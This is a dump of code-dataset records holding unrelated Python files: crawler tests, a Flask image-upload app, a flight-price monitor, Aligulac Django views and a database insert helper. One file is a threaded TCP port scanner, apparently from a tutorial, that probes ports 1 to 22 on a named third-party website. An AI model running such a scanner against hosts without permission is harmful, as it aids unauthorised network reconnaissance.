__init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.data = self.config.get('data')\n self.server_address = self.config.get('server_address')\n\n def start_requests(self):\n yield HttpRequest(\"http://unknown/\", errback=self.error_back)\n yield HttpRequest(\"http://unknown/\", dont_filter=True, errback=self.async_error_back)\n yield HttpRequest(\"http://{}/error\".format(self.server_address), errback=self.handle_request_error)\n yield HttpRequest(\"http://{}/\".format(self.server_address), dont_filter=True)\n yield HttpRequest(\"http://{}/\".format(self.server_address), dont_filter=True, callback=self.generator_parse)\n yield HttpRequest(\"http://{}/\".format(self.server_address), dont_filter=True, callback=self.func_prase)\n yield HttpRequest(\"http://{}/\".format(self.server_address), dont_filter=True, callback=self.async_parse)\n yield HttpRequest(\"http://{}/\".format(self.server_address), dont_filter=True, callback=self.return_list_parse)\n yield HttpRequest(\"http://{}/\".format(self.server_address), dont_filter=True, callback=self.return_none_parse)\n\n def parse(self, response):\n self.data.add('parse')\n\n def error_back(self, request, err):\n self.data.add('error_back')\n raise RuntimeError('not an error actually')\n\n async def async_error_back(self, request, err):\n self.data.add('async_error_back')\n raise RuntimeError('not an error actually')\n\n def handle_request_error(self, request, error):\n assert isinstance(error, FooError)\n self.data.add('handle_request_error')\n\n def generator_parse(self, response):\n self.data.add('generator_parse')\n if response.status / 100 != 2:\n raise RuntimeError('not an error actually')\n # it will never come here\n yield None\n\n def func_prase(self, response):\n self.data.add('func_parse')\n raise RuntimeError('not an error actually')\n\n async def async_parse(self, response):\n self.data.add('async_parse')\n raise RuntimeError('not an error actually')\n\n def return_list_parse(self, response):\n self.data.add('return_list_parse')\n return []\n\n def return_none_parse(self, response):\n self.data.add('return_none_parse')\n\n\ndef test_spider_handlers():\n data = set()\n run_spider(HandlerSpider, log_level='DEBUG', extensions=[HandlerDownloaderMiddleware, HandlerSpiderMiddleware],\n data=data, server_address='python.org')\n assert 'parse' in data\n assert 'error_back' in data\n assert 'async_error_back' in data\n assert 'handle_request_error' in data\n assert 'generator_parse' in data\n assert 'func_parse' in data\n assert 'async_parse' in data\n assert 'return_list_parse' in data\n assert 'return_none_parse' in data\n\n\nclass DummyItem(Item):\n pass\n\n\nclass DroppedItem(Item):\n pass\n\n\nclass ErrorItem(Item):\n pass\n\n\nclass FooItemPipeLine:\n def __init__(self, data):\n self.data = data\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(crawler.config.get('data'))\n\n def handle_item(self, item):\n if isinstance(item, DroppedItem):\n raise IgnoreItem\n elif isinstance(item, ErrorItem):\n raise RuntimeError('not an error actually')\n self.data['item'] = item\n\n\nclass ItemSpider(Spider):\n def start_requests(self):\n yield HttpRequest('http://python.org/')\n\n def parse(self, response):\n yield DroppedItem()\n yield ErrorItem()\n yield DummyItem()\n\n\ndef test_handle_item():\n data = {}\n run_spider(ItemSpider, log_level='DEBUG', data=data, extensions=[FooItemPipeLine])\n assert isinstance(data.get('item'), DummyItem)\n\n\nclass ToDumpSpider(Spider):\n def start_requests(self):\n yield HttpRequest('http://python.org/', callback=self.parse_response, meta={'key': 'value'})\n\n async def parse_response(self, response):\n while True:\n await asyncio.sleep(10)\n\n\nclass ToLoadSpider(Spider):\n def start_requests(self):\n pass\n\n async def parse_response(self, response):\n data = self.config.get('data')\n data['url'] = response.request.url\n data['meta'] = response.meta\n","sub_path":"tests/test_crawler.py","file_name":"test_crawler.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"467779298","text":"# -- Load library --\nimport logging\n\n\n# -- custom logger --\ndef setup_custom_logger(name):\n formatter = logging.Formatter(fmt='%(asctime)s - %(levelname)s - %(module)s - %(message)s')\n\n # handler = logging.StreamHandler()\n handler = logging.FileHandler('logs/application.log')\n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(handler)\n\n return logger\n","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"571679330","text":"#!/usr/bin/env python3\n\"\"\"count the vowels in a word\"\"\"\nimport sys\nfrom collections import Counter\n\nargs = sys.argv\n\nif len(args) < 2:\n print(\"Usage:\", args[0], \"STRING\")\n sys.exit(1)\n\nc = Counter(args[1].lower())\n\nnumv = c[\"a\"] + c[\"e\"] + c[\"i\"] + c[\"o\"] + c[\"u\"]\n\nif numv == 1:\n sp = \"vowel\"\n ir = \"is\"\nelse:\n sp = \"vowels\"\n ir = \"are\"\n\nprint(\"There\", ir, numv, sp, \"in\", '\"'+args[1]+'.\"')\n\n","sub_path":"problems/hello-py/vowel_counter.py","file_name":"vowel_counter.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"175359247","text":"import spotlight\nfrom spotlight import SpotlightException\nimport pandas\nimport urllib\nimport time\n\ndef start():\n\tcoursesCSVname=r'CSV\\Courses.csv'\n\ttopicsCSVname=r\"CSV\\Topics.csv\"\n\t\n\tcourses_df=pandas.read_csv(coursesCSVname, encoding='ISO-8859-1')\n\tcourses=courses_df.to_dict('records')\n\t\n\t\n\tfinal_course_topics=list()\n\tcou_list = list(range(0,len(courses)))\n\tprint(cou_list)\n\tadded_index=40\n\tstart=0\n\twhile(start=len(cou_list):\n\t\t\tend=len(cou_list)\n\t\tprint(start, end) \n\t\t############################################\t\n\t\tfor val_llop in range(start,end):\n\t\t\tloop=cou_list[val_llop]\n\t\t\tprint(loop)\n\t\t\ttry:\n\t\t\t\tcourse=courses[loop]\n\t\t\t\t##courses_updated.add(course['Course Subject']+\":\"+str(course['Course Number']))\n\t\t\t\ttopic_included=list()\n\t\t\t\tdata=\"\"\n\t\t\t\tif str(course[\"Course Description\"]).lower()==\"nan\":\n\t\t\t\t\tdata=course[\"Course Name\"]\n\t\t\t\telse:\n\t\t\t\t\tdata=course[\"Course Name\"]+\" \"+str(course[\"Course Description\"])\n\t\t\t\tlinks=spotlight.annotate('https://api.dbpedia-spotlight.org/en/annotate', data, confidence=0.5, support=20)\n\t\t\t\t##computer_topics=list()\t\n\t\t\t\tfor link in links:\n\t\t\t\t\tif link['surfaceForm'].lower() not in topic_included:\n\t\t\t\t\t\ttopic=dict()\n\t\t\t\t\t\ttopic['Course Subject']=course['Course Subject']\n\t\t\t\t\t\ttopic['Course Number']=course['Course Number']\n\t\t\t\t\t\ttopic['Course Name']=course[\"Course Name\"]\n\t\t\t\t\t\ttopic_included.append(link['surfaceForm'].lower())\n\t\t\t\t\t\ttopic['Topic']=link['surfaceForm']\n\t\t\t\t\t\ttopic['URI']=link['URI']\n\t\t\t\t\t\tcourse_topics.append(topic)\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t##course_topics.extend(computer_topics)\n\t\t\t## repeat only if 403 is thrown\n\t\t\texcept SpotlightException:\n\t\t\t\tcontinue\n\t\t\texcept:\n\t\t\t\tindexes.append(loop)\n\t\t\n\t\t\t\n\t\tprint(\"indexes\",indexes)\n\t\tprint(start,end)\n\t\t##to save data\n\t\tremove_lst=set()\n\t\tfor loop in range(0,len(cou_list)):\n\t\t\tif loop>=start and loop15000:\n print(x)\n","sub_path":"mypy-17.py","file_name":"mypy-17.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"438863703","text":"import arrow\nimport pprint\nfrom read_city_code import read_city_code\nfrom APIs import get_price_info_tuniu, get_price_info_qunar\nimport calendar\nimport sys\n\nprint('\\n\\tWelcome to Air-Fare-Monitor V1.0!')\nprint('\\tThe information is from http://www.tuniu.com and https://www.qunar.com.')\nprint('\\tWhen you decide to buy air ticket(s), I suggest you to')\nprint('\\t1. check details on the above websites.')\nprint('\\t2. go to the offical website of some airline and buy the ticket(s) with the origin price(s).')\nprint('\\t=========================================')\nprint('\\t欢迎来到机票监控器V1.0!')\nprint('\\t程序信息来源于 http://www.tuniu.com 和 https://www.qunar.com 。')\nprint('\\t当你决定购买机票时,我建议你:')\nprint('\\t1. 到上述数据源网站查看详细的机票信息。')\nprint('\\t2. 到航空公司官方网站购买原价机票。\\n')\nprint('All the options have default values. You can press to skip.')\ndef get_input(info, default, add=''):\n value = input(info)\n if value == '':\n value = default\n if type(value) != type('') or not value:\n return value\n return value + add\n\n\nstart_Fri = get_input('(Default is today) Monitor will start from(yyyy-mm-dd): ', arrow.utcnow().format('YYYY-MM-DD') + 'T00:00:00+00:00', 'T00:00:00+00:00')\narr_start_Fri = arrow.get(start_Fri)\nwhile arr_start_Fri.weekday() != calendar.FRIDAY:\n arr_start_Fri = arr_start_Fri.shift(days=+1)\n\n\nend_Fri = get_input('(Default is the last Friday in this year) Monitor will end until(yyyy-mm-dd): ', str(arrow.utcnow().year) + '-12-31T00:00:00+00:00','T00:00:00+00:00')\narr_end_Fri = arrow.get(end_Fri)\nwhile arr_end_Fri.weekday() != calendar.FRIDAY:\n arr_end_Fri = arr_end_Fri.shift(days=-1)\n\n\ncity2code = read_city_code()\norg = get_input('(Default is 昆明) Origin City: ', '昆明')\nif org not in city2code:\n print('Error: ' + org + 'not a valid city name.\\n Check http://www.carnoc.com/mhzl/jchzl/airport3code.htm.')\n sys.exit()\ndst = get_input('(Default is 上海) Destination City: ', '上海')\nif dst not in city2code:\n print('Error: ' + dst + 'not a valid city name.\\n Check http://www.carnoc.com/mhzl/jchzl/airport3code.htm.')\n sys.exit()\n\ntwo_way = get_input('(Default is N) Two way tickets (y/N): ', False)\nif two_way == 'N':\n two_way = False\nelif two_way is not False:\n two_way = True\nelse:\n pass\n\nif two_way:\n interval = int(get_input('(Default is 2) # of interval days: ', 2))\n\nthreshold = get_input('(Default is None) The highest price to inform: ', None)\n\nif threshold:\n print('\\nNote: Only test for 163/126 smtp email server.\\n')\n email_reminder = get_input('(Default is N) Receive a email reminder (y/N): ', False)\n if email_reminder == 'N':\n email_reminder = False\n elif email_reminder is not False:\n email_reminder = True\n else:\n pass\n\nprice_tuniu = get_price_info_tuniu(city2code[org], city2code[dst], arr_start_Fri.format('YYYY-MM-DD'), arr_end_Fri.format('YYYY-MM-DD'))\nprice_qunar = get_price_info_qunar(org, dst, arr_start_Fri, arr_end_Fri)\n\nif two_way:\n priceb_tuniu = get_price_info_tuniu(city2code[dst], city2code[org], arr_start_Fri.format('YYYY-MM-DD'), arr_end_Fri.format('YYYY-MM-DD'))\n priceb_qunar = get_price_info_qunar(dst, org, arr_start_Fri, arr_end_Fri)\n\n pricet_tuniu = dict.fromkeys([item for item in price_tuniu if arrow.get(item).shift(days=+interval).format('YYYY-MM-DD') in priceb_tuniu])\n pricet_qunar = dict.fromkeys([item for item in price_qunar if arrow.get(item).shift(days=+interval).format('YYYY-MM-DD') in priceb_qunar])\n\n for key in pricet_tuniu:\n pricet_tuniu[key] = price_tuniu[key] + priceb_tuniu[arrow.get(key).shift(days=+interval).format('YYYY-MM-DD')]\n\n for key in pricet_qunar:\n pricet_qunar[key] = price_qunar[key] + priceb_qunar[arrow.get(key).shift(days=+interval).format('YYYY-MM-DD')]\n\n #pprint.pprint(pricet_tuniu)\n #pprint.pprint(pricet_qunar)\n\nif not two_way:\n if not threshold:\n print('Tuniu (single):')\n pprint.pprint(price_tuniu)\n print('Qunar (single):')\n pprint.pprint(price_qunar)\n else:\n print('Tuniu (single):')\n text_tuniu = {k: v for k, v in price_tuniu.items() if v <= int(threshold)}\n pprint.pprint(text_tuniu)\n print('Qunar (single):')\n text_qunar = {k: v for k, v in price_qunar.items() if v <= int(threshold)}\n pprint.pprint(text_qunar)\n\n\nelse:\n ## 暂时仅支持往返模式, 7天一检测周期\n start_date = arr_start_Fri\n tuniu_Fri = {}\n qunar_Fri = {}\n while start_date < arr_end_Fri:\n start_date_str = start_date.format('YYYY-MM-DD')\n if start_date_str in pricet_tuniu:\n tuniu_Fri[start_date_str] = pricet_tuniu[start_date_str]\n if start_date_str in pricet_qunar:\n qunar_Fri[start_date_str] = pricet_qunar[start_date_str]\n \n start_date = start_date.shift(days=+7)\n\n if not threshold:\n print('Tuniu (two way):')\n pprint.pprint(tuniu_Fri)\n print('Qunar (two way):')\n pprint.pprint(qunar_Fri)\n else:\n print('Tuniu (two way):')\n text_tuniu = {k: v for k, v in tuniu_Fri.items() if v <= int(threshold)}\n pprint.pprint(text_tuniu)\n print('Qunar (two way):')\n text_qunar = {k: v for k, v in qunar_Fri.items() if v <= int(threshold)}\n pprint.pprint(text_qunar)\n\n\nif email_reminder:\n from reminder import Reminder, read_setting\n import json\n email_setting = read_setting()\n r = Reminder(org, dst, email_setting['mail_user'], json.dumps({'Tuniu': text_tuniu, 'Qunar': text_qunar}, indent=4))\n r.send_email()\n\n","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"609913281","text":"#2015/10/13\r\nimport socket\r\nimport threading #allows multiple processes to take place at a time\r\nfrom queue import Queue\r\nimport time\r\n\r\nprint_lock = threading.Lock() #reference locking ability of thread module\r\nserver = 'pythonprogramming.net'\r\n\r\ndef portscan(port): #port scanner\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #connection type: tcp connection\r\n try:\r\n con = s.connect((server,port))\r\n with print_lock:\r\n print('port ',port,' is open!')\r\n con.close()\r\n except:\r\n pass\r\n'''\r\n#The last job was:\r\ndef exJob(worker): #task\r\n time.sleep(0.5) #mimicks time to complete a job\r\n\r\n with print_lock: #can't access/modify simultaneously by two processes; unlocks when unless one process done\r\n print(threading.current_thread().name, worker) #releases lock once done printing threader name and worker\r\n'''\r\ndef threader():\r\n while True: #continue while main thread is True\r\n worker = q.get()\r\n portscan(worker) #function\r\n #exJob(worker) \r\n q.task_done() #complete and move on\r\nq = Queue()\r\n\r\nfor x in range(30): #30 threads to do some work\r\n t = threading.Thread(target = threader) #target is threader function\r\n t.daemon = True #dies when main thread dies\r\n t.start() #start threading\r\n\r\nstart = time.time()\r\n\r\n#assign the amount of jobs\r\nfor worker in range(1,23): #test first 24; try 100 ports!\r\n q.put(worker) #\r\nq.join() #wait until thread terminates; blocks the program from quitting until the queue becomes empty\r\n\r\nprint('Entire job took:', time.time()-start) #duration of process\r\n","sub_path":"port_threading.py","file_name":"port_threading.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"342497351","text":"from collections import defaultdict\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport optuna\n\nDIR = 'testing2.db'\n\n## load\nstudy = optuna.create_study(\n load_if_exists=True,\n study_name=DIR.split(\".\")[0],\n storage=f\"sqlite:///{DIR}\",\n direction='maximize'\n) # Create a new study.\ndf = study.trials_dataframe(attrs=('number', 'value', 'params', 'state'))\n\n## plot\nplt.scatter(2 ** df.params_batch_size, df.value)\nplt.title(\"batch_size\")\nplt.ylabel(\"accuracy\")\nplt.tight_layout()\nplt.xscale(\"log\")\nplt.ylim((0.6, 1.05))\nplt.grid()\nplt.show()\n\nplt.scatter(2 ** df.params_hidden_dim, df.value)\nplt.title(\"hidden_dim\")\nplt.ylabel(\"accuracy\")\nplt.tight_layout()\nplt.xscale(\"log\")\nplt.ylim((0.6, 1.05))\nplt.grid()\nplt.show()\n\nplt.scatter(df.params_lr, df.value)\nplt.title(\"learning rate\")\nplt.ylabel(\"accuracy\")\nplt.tight_layout()\nplt.xscale(\"log\")\nplt.ylim((0.6, 1.05))\nplt.grid()\nplt.show()\n\nplt.scatter(df.params_weight_decay, df.value)\nplt.title(\"weight_decay\")\nplt.ylabel(\"accuracy\")\nplt.tight_layout()\nplt.xscale(\"log\")\nplt.ylim((0.6, 1.05))\nplt.grid()\nplt.show()\n\nplot_dict = defaultdict(list)\nfor activation in df.params_activation.unique():\n subset = df[df.params_activation == activation]\n mean = subset.value.mean()\n stdev = subset.value.std()\n conf = (2.576 * stdev) / np.sqrt(len(subset))\n plot_dict['mean'].append(mean)\n plot_dict['conf'].append(conf)\n plot_dict['name'].append(activation)\nx_pos = np.arange(len(plot_dict[\"name\"]))\nplt.bar(x_pos, plot_dict['mean'], yerr=plot_dict['conf'])\nplt.xticks(x_pos, plot_dict['name'])\nplt.title(\"activations\")\nplt.ylim((0.6, 1.05))\nplt.grid()\nplt.tight_layout()\nplt.show()\n","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"395746610","text":"#! usr/bin/env python3\n# Copyright (C) 2015 by luo xing\n# License: GPL\n\nimport numpy as np\nimport re\n\n\ndef check(lst, n):\n ans = 0\n for i in range(n):\n for j in range(i + 1, n):\n for k in range(j + 1, n):\n len = lst[i] + lst[j] + lst[k]\n maxC = max(lst[i], lst[j], lst[k])\n rest = len - maxC\n if maxC < rest:\n ans = max(ans, len)\n\n return ans\n\n\nL = []\n\n\ndef slove(x, n):\n minT = 0\n for i in range(n):\n minT = max(minT, min(x[i], L - x[i]))\n\n maxT = 0\n for i in range(n):\n maxT = max(maxT, max(x[i], L - x[i]))\n\n\nmemo = []\n\n\ndef fib(n):\n if n <= 1:\n return n\n if memo[n] != 0:\n return memo[n]\n memo[n] = fib(n - 1) + fib(n - 2)\n return memo[n]\n\n\ndef x():\n t = 1\n\n def __init__(self):\n self.t = 1\n\n def y(self):\n print(\"jky\")\n self.t = 0\n x()\n\n if t == 1:\n print('jl')\n y()\n t = 0\n\n\ndef test1():\n s = 'NP(PRP he) NP(JJS strongest)(NN rain) ADVP(RB ever) VP(VBN recorded) PP(IN in) NP(NNP India)'\n regex = r\"[A-Z]{2,4}((\\([A-Z]{2,4} [\\w]*\\)){1,2})\"\n for match in re.finditer(regex, s):\n print(match.group(1))\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n import string\n s = 'The quick brown fox jumped over the lazy dog.'\n print(string.capwords(s))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"463411566","text":"from flask import Flask, request, redirect, url_for, make_response, abort\nfrom werkzeug import secure_filename\nfrom pymongo import Connection\nfrom bson.objectid import ObjectId\nfrom gridfs import GridFS\nfrom gridfs.errors import NoFile\nimport numpy as np\nimport cv2\nimport sys\nfrom sklearn.externals import joblib\n\nfrom helpers import clarity_rating\n\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\nDB = Connection().geoai\nFS = GridFS(DB)\n\napp = Flask(__name__)\n\ndef allowed_file(filename):\n\treturn '.' in filename and \\\n\t\t\tfilename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n\tif request.method == 'POST':\n\t\tfile = request.files['file']\n\t\tif file and allowed_file(file.filename):\n\t\t\tfilename = secure_filename(file.filename)\n\t\t\toid = FS.put(file, content_type=file.content_type, filename=filename)\n\t\t\treturn redirect(url_for('serve_gridfs_file', oid=str(oid)))\n\treturn '''\n\t\n\t\n\t\n\tUpload new file\n\t\n\t\n\t

Upload new file

\n\t
\n\t

\n\t

\n\t\n\tAll files\n\t\n\t\n\t''' % url_for('list_gridfs_files')\n\n@app.route('/files')\ndef list_gridfs_files():\n\tclassifier = joblib.load(\"demo\")\n\tfiles = [FS.get_last_version(file) for file in FS.list()]\n\ti=0\n\tdata=[]\n\tidset=[]\n\tresult=[]\n\twhile i%s')\\\n % (update, p.tag, p.id, id, p.tag)\n else:\n s += ('%s')\\\n % (update, p.tag, p.id, updateline, id, p.tag)\n\n lst.append(s)\n\n num = 5\n if len(lst) < num:\n s = 'Possible matches: ' + ', '.join(lst[:-1]) + ' and ' + lst[-1] + '.'\n else:\n rand = ''.join(random.choice(string.ascii_lowercase) for _ in xrange(10))\n s = 'Possible matches: ' % rand + ', '.join(lst[:num-1])\\\n + ' and ' % rand\\\n + '%i more' % (len(lst) - num + 1)\\\n + '%s'\\\n % (rand, ', '.join(lst[:-1]) + ' and ' + lst[-1])\\\n + '.'\n\n Message.__init__(self, s, '\\'%s\\' not unique' % search, type)\n self.id = id\n\n\ndef generate_messages(obj):\n ret = []\n for m in obj.message_set.all():\n ret.append(Message(m.text, m.title, m.type))\n return ret\n\ndef base_ctx(section=None, subpage=None, request=None, context=None):\n curp = Period.objects.filter(computed=True).order_by('-start')[0]\n menu = [('Ranking', '/periods/%i' % curp.id),\\\n ('Teams', '/teams/'),\\\n ('Records', '/records/history'),\\\n ('Results', '/results/'),\\\n ('Reports', '/reports/'),\\\n ('Predict', '/predict/'),\\\n ('About', '/faq/'),\\\n ('Submit', '/add/')]\n\n base = {'curp': curp, 'menu': menu, 'debug': DEBUG, 'cur_path': request.get_full_path()}\n base.update(csrf(request))\n\n if request != None:\n base['adm'] = request.user.is_authenticated()\n base['user'] = request.user.username\n\n if section == 'Records':\n base['submenu'] = [('History', '/records/history/'),\n ('HoF', '/records/hof/'),\\\n ('All', '/records/race/?race=all'),\\\n ('Protoss', '/records/race/?race=P'),\\\n ('Terran', '/records/race/?race=T'),\\\n ('Zerg', '/records/race/?race=Z')]\n elif section == 'Results':\n base['submenu'] = [('By Date', '/results/'),\\\n ('By Event', '/results/events/'),\\\n ('Search', '/results/search/')]\n elif section == 'Submit' and base['adm']:\n base['submenu'] = [('Matches', '/add/'),\\\n ('Review', '/add/review/'),\\\n ('Events', '/add/events/'),\\\n ('Open events', '/add/open_events/'),\\\n ('Integrity', '/add/integrity/'),\\\n ('Misc', '/add/misc/')]\n elif section == 'Teams':\n base['submenu'] = [('Ranking', '/teams/'),\\\n ('Transfers', '/player_transfers/')]\n elif section == 'Ranking':\n base['submenu'] = [('Current', '/periods/%i' % curp.id),\\\n ('History', '/periods/'),\\\n ('Earnings', '/earnings/')]\n elif section == 'Predict':\n base['submenu'] = [('Predict', '/predict/'),\n #('Factoids', '/factoids/'),\n ('Compare', '/compare/')]\n elif section == 'About':\n base['submenu'] = [('FAQ', '/faq/'),\n ('Blog', '/blog/'),\n #('Staff', '/staff/'),\n ('Database', '/db/')]\n elif section == 'Reports':\n pass\n\n if section != None:\n base['curpage'] = section\n\n if subpage != None:\n base['cursubpage'] = subpage\n\n if context != None:\n if type(context) == Player:\n rating = Rating.objects.filter(player=context, decay=0).order_by('-period')\n earnings = Earnings.objects.filter(player=context)\n\n base_url = '/players/%i-%s/' % (context.id, urlfilter(context.tag))\n\n base['submenu'] += [None, ('%s:' % context.tag, base_url)]\n\n if rating.exists():\n base['submenu'].append(('Rating history', base_url + 'historical/'))\n\n base['submenu'].append(('Match history', base_url + 'results/'))\n \n if earnings.exists():\n base['submenu'].append(('Earnings', base_url + 'earnings/'))\n\n if rating.exists():\n base['submenu'].append(('Adjustments', base_url + 'period/%i/' % rating[0].period.id))\n\n base['messages'] = []\n\n return base\n\ndef db(request):\n base = base_ctx('About', 'Database', request)\n\n ngames = Match.objects.all().aggregate(Sum('sca'))['sca__sum'] + Match.objects.all().aggregate(Sum('scb'))['scb__sum']\n nmatches = Match.objects.all().count()\n nuntreated = Match.objects.filter(treated=False).count()\n\n nwol = Match.objects.filter(game='WoL').count()\n nhots = Match.objects.filter(game='HotS').count()\n\n nwolgames = Match.objects.filter(game='WoL').aggregate(Sum('sca'))['sca__sum'] + Match.objects.filter(game='WoL').aggregate(Sum('scb'))['scb__sum']\n nhotsgames = Match.objects.filter(game='HotS').aggregate(Sum('sca'))['sca__sum'] + Match.objects.filter(game='HotS').aggregate(Sum('scb'))['scb__sum']\n\t\n nonline = Match.objects.filter(offline = False).count()\n noffline = Match.objects.filter(offline = True).count()\n\t\n nonlinegames = Match.objects.filter(offline = False).aggregate(Sum('sca'))['sca__sum'] + Match.objects.filter(offline= False).aggregate(Sum('scb'))['scb__sum']\n nofflinegames = Match.objects.filter(offline = True).aggregate(Sum('sca'))['sca__sum'] + Match.objects.filter(offline= True).aggregate(Sum('scb'))['scb__sum']\n\n npartial = Match.objects.exclude(eventobj__isnull=True, event='').count()\n nfull = Match.objects.filter(eventobj__isnull=False).count()\n nuncatalogued = Match.objects.filter(eventobj__isnull=True).count()\n\n nplayers = Player.objects.all().count()\n nkoreans = Player.objects.filter(country='KR').count()\n nteams = Group.objects.filter(is_team=True).count()\n nactive = Group.objects.filter(active=True, is_team=True).count()\n ninactive = Group.objects.filter(active=False, is_team=True).count()\n\n\n base.update({'ngames': ngames, 'nmatches': nmatches, 'nuntreated': nuntreated,\\\n 'nwol': nwol, 'nhots': nhots, 'nonline': nonline, 'noffline': noffline,\\\n 'npartial': npartial, 'nfull': nfull, 'nuncatalogued': nuncatalogued,\\\n 'nplayers': nplayers, 'nkoreans': nkoreans,\\\n 'nteams': nteams, 'nactive': nactive, 'ninactive': ninactive,\\\n\t\t 'nwolgames': nwolgames, 'nhotsgames': nhotsgames, 'nonlinegames': nonlinegames, 'nofflinegames':nofflinegames})\n\n submitters = []\n for u in User.objects.all():\n n = Match.objects.filter(submitter=u).count()\n if n > 0:\n submitters.append((u, n))\n submitters.sort(key=lambda t: t[1], reverse=True)\n base['submitters'] = submitters\n\n dumpfile = '/usr/local/www/media/al/aligulac.sql'\n base['dump'] = os.path.exists(dumpfile)\n if base['dump']:\n stat = os.stat(dumpfile)\n base['megabytes'] = float(stat.st_size)/1048576\n base['modified'] = datetime.fromtimestamp(stat.st_mtime)\n\n base['updated'] = datetime.fromtimestamp(os.stat(PATH_TO_DIR + 'update').st_mtime)\n\n return render_to_response('db.html', base)\n\ndef staff(request):\n base = base_ctx('About', 'Staff', request)\n\n return render_to_response('staff.html', base)\n\ndef home(request):\n base = base_ctx(request=request)\n\n period = Period.objects.filter(computed=True).order_by('-start')[0]\n entries = ratings.tools.filter_active_ratings(Rating.objects.filter(period=period).order_by('-rating'))\n entries = entries.select_related('team', 'teammembership')[0:10]\n for entry in entries:\n teams = entry.player.groupmembership_set.filter(current=True, group__is_team=True)\n if teams.exists():\n entry.team = teams[0].group.shortname\n entry.teamfull = teams[0].group.name\n entry.teamid = teams[0].group.id\n\n blogs = Post.objects.order_by('-date')[0:3]\n\n base.update({'entries': entries, 'blogposts': blogs})\n \n return render_to_response('index.html', base)\n\ndef search(request, q=''):\n base = base_ctx(request=request)\n\n if q == '':\n q = request.GET['q']\n\n terms = shlex.split(q.encode())\n\n players = ratings.tools.find_player(terms, make=False, soft=True)\n\n teams = Group.objects.all()\n for qpart in terms:\n if qpart.strip() == '':\n continue\n query = Q(name__icontains=qpart) | Q(alias__name__icontains=qpart)\n teams = teams.filter(query)\n teams = teams.distinct()\n\n events = Event.objects.filter(type__in=['category','event'])\n for qpart in terms:\n if qpart.strip() == '':\n continue\n events = events.filter(Q(fullname__icontains=qpart))\n events = events.order_by('lft')\n\n if players.count() == 1 and teams.count() == 0 and events.count() == 0:\n return redirect('/players/%i-%s/' % (players[0].id, urlfilter(players[0].tag)))\n elif players.count() == 0 and teams.count() == 1 and events.count() == 0:\n return redirect('/teams/%i-%s/' % (teams[0].id, urlfilter(teams[0].name)))\n elif players.count() == 0 and teams.count() == 0 and events.count() == 1:\n return redirect('/results/events/%i-%s/' % (events[0].id, urlfilter(events[0].fullname)))\n\n base.update({'players': players, 'query': q, 'teams': teams, 'events': events})\n\n return render_to_response('search.html', base)\n\ndef logoutv(request):\n logout(request)\n return redirect('/add/')\n\ndef loginv(request):\n base = base_ctx(request=request)\n base.update(csrf(request))\n return render_to_response('login.html', base)\n\ndef changepwd(request):\n base = base_ctx(request=request)\n\n if not request.user.is_authenticated():\n base.update(csrf(request))\n return render_to_response('login.html', base)\n\n base.update({'user': request.user.username})\n\n if not ('old' in request.POST and 'new' in request.POST and 'newre' in request.POST):\n base.update(csrf(request))\n return render_to_response('changepwd.html', base)\n\n if not request.user.check_password(request.POST['old']):\n base['messages'].append(Message('The old password didn\\'t match. Your password was not changed.',\n type=Message.ERROR))\n base.update(csrf(request))\n return render_to_response('changepwd.html', base)\n \n if request.POST['new'] != request.POST['newre']:\n base['messages'].append(Message('The new passwords didn\\'t match. Your password was not changed.',\n type=Message.ERROR))\n base.update(csrf(request))\n return render_to_response('changepwd.html', base)\n\n request.user.set_password(request.POST['new'])\n base['messages'].append(Message(\n 'The password for ' + request.user.username + ' was successfully changed.', type=Message.SUCCESS))\n request.user.save()\n\n return render_to_response('changepwd.html', base)\n\ndef h404(request):\n base = base_ctx(request=request)\n\n return HttpResponseNotFound(render_to_string('404.html', base))\n\ndef h500(request):\n base = base_ctx(request=request)\n\n return HttpResponseNotFound(render_to_string('500.html', base))\n","sub_path":"aligulac/aligulac/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"448878996","text":"import psycopg2\nclass Customer:\n def __init__(self, ConnectionData):\n self.ConnectionData = ConnectionData\n def insert(self, customer):\n con = None\n try:\n con = psycopg2.connect(user=self.ConnectionData['user'],\n password=self.ConnectionData['password'],\n host=self.ConnectionData['host'],\n port=self.ConnectionData['port'],\n database=self.ConnectionData['database'])\n cur = con.cursor()\n sql = \"INSERT INTO TblCustomers(CustomerName, ContactName, Address, City, PostalCode, Country) VALUES (%s, %s, %s, %s, %s, %s)\"\n record_to_insert = (customer.CustomerName, customer.ContactName, customer.Address, customer.City, customer.PostalCode, customer.Country)\n cur.execute(sql, record_to_insert)\n con.commit()\n con.close()\n return 'Insert TblCustomers successfully'\n except (Exception, 